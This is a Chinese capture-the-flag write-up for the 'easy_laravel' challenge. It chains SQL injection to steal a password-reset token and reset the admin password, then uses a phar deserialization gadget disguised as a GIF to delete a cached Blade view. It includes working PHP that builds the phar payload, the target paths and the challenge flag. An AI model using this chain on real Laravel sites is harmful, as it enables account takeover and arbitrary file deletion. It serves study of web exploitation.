[CTF]攻防世界:easy_laravel 学习

题目:攻防世界:easy_laravel 学习

提示:blade + pop chain(代码审计+sql注入+blade缓存+反序列化)

直接F12查看源码

php的web框架

一、注入

查看源码:

这里应该是注入点:

看到管理员认证,判断邮箱

可以重置密码,但是需要token

token在表password_reset中

确定思路:注册用户sql注入拿到token-->reset一下管理员的密码,生成token-->登录获取flag

1、注入

laravel内置重置密码在Illuminate\Auth\Passwords 中实现,重置密码需要填写邮箱,并向邮箱发送一个重置链接。

laravel在5.4以后都是将token加密存储的,而之前是明文存储,所以我们就可以注入出token重置admin密码

先访问**/password/reset重置admin密码,然后注出token,访问/password/reset/token**,完成重置


2、登录后发现显示 no flag

二. blade 模板

Blade 是 Laravel 提供的一个简单而又强大的模板引擎。和其他流行的 PHP 模板引擎不同,Blade 并不限制你在视图中使用原生 PHP 代码。所有 Blade 视图文件都将被编译成原生的 PHP 代码并缓存起来,除非它被修改,否则不会重新编译,这就意味着 Blade 基本上不会给你的应用增加任何负担。Blade 视图文件使用 .blade.php 作为文件扩展名,被存放在 resources/views 目录。

所以当我们修改了flag的balde模板但是还没有编译使其渲染出新的flag页面,其页面还是没修改时的那个缓存

删除缓存文件:

1、上传phar文件

2、利用phar文件删除缓存文件

upload 实现phar文件上传 check利用

通过此类实现反序列化。

确定一下相关文件目录:

1、blade缓存位置:storage/framework/views

2、apache默认目录:/var/www/html/

加一起缓存文件就是 :/var/www/html/storage/framework/views/flag.blade.php

(sha1()==>34e41df0934a75437873264cd28e2d835bc38772)

phaer 文件是以序列化形式存储的。当解析它的时候,必然会用到反序列化的一些魔术方法。受影响的函数包括

从其他师傅那学习到的生成phar的代码:

dart 复制代码
<?php 
	require 'vendor/autoload.php';
	$a = serialize(new Swift_ByteStream_TemporaryFileByteStream()); 
	var_dump(unserialize($a)); 
	var_dump($a); # 这个函数很有趣,$_path 也就是删除的目录是可以自己制定的,将这里面的内容换成我们想要的内容,就可以删掉flag的缓存文件。 
	$a = preg_replace("/\/tmp\/FileByteStream[\w]{6}/","/usr/share/nginx/html/storage/framework/views/34e41df0934a75437873264cd28e2d835bc38772.php", $a); $a = str_replace('s:25', 's:90', $a); # 这里将 _path 的内容修改掉 
	$b = unserialize($a); 
	$p = new Phar('./shell.phar', 0); 
	$p->startBuffering(); 
	$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>'); # 改文件头 
	$p->setMetadata($b); 
	$p->addFromString('test.txt','text'); 
	$p->stopBuffering(); 
	rename('shell.phar', '1.gif') 
?>

生成后,将1.gif上传,然后点击check。

修改数据包

重新访问/flag路由,得到flag

flag: flag{d64e4b06f672429682a96b11172a8938}

相关推荐
卓怡学长1 小时前
w272基于springboot便民医疗服务小程序
java·spring boot·spring·小程序·intellij-idea
一方~1 小时前
权限系统设计
java
β添砖java1 小时前
Ollama工具学习
学习
盐焗鹌鹑蛋1 小时前
【C++】多态
java·jvm·c++
rebibabo1 小时前
Java高并发底层原理(七)volatile 到底解决了什么问题
java·学习笔记·volatile·可见性·有序性·指令重排
名字还没想好☜1 小时前
Go 并发实战:用 channel 实现 worker pool
java·数据库·后端·golang·go
小巧的砖头1 小时前
使用SVN+CruiseControl+ANT实现持续集成之一
学习·算法
人道领域1 小时前
【LeetCode刷题日记】贪心算法理论与实战:455.分发饼干最优解
java·开发语言·数据结构·算法·leetcode·贪心算法
rebibabo2 小时前
Java高并发底层原理(六)—— 多核 CPU 如何保持缓存一致
java·缓存·cas·缓存一致性·cache line·longadder·mesi协议
_abab2 小时前
Java面试宝典:从基础到架构2
java·面试·架构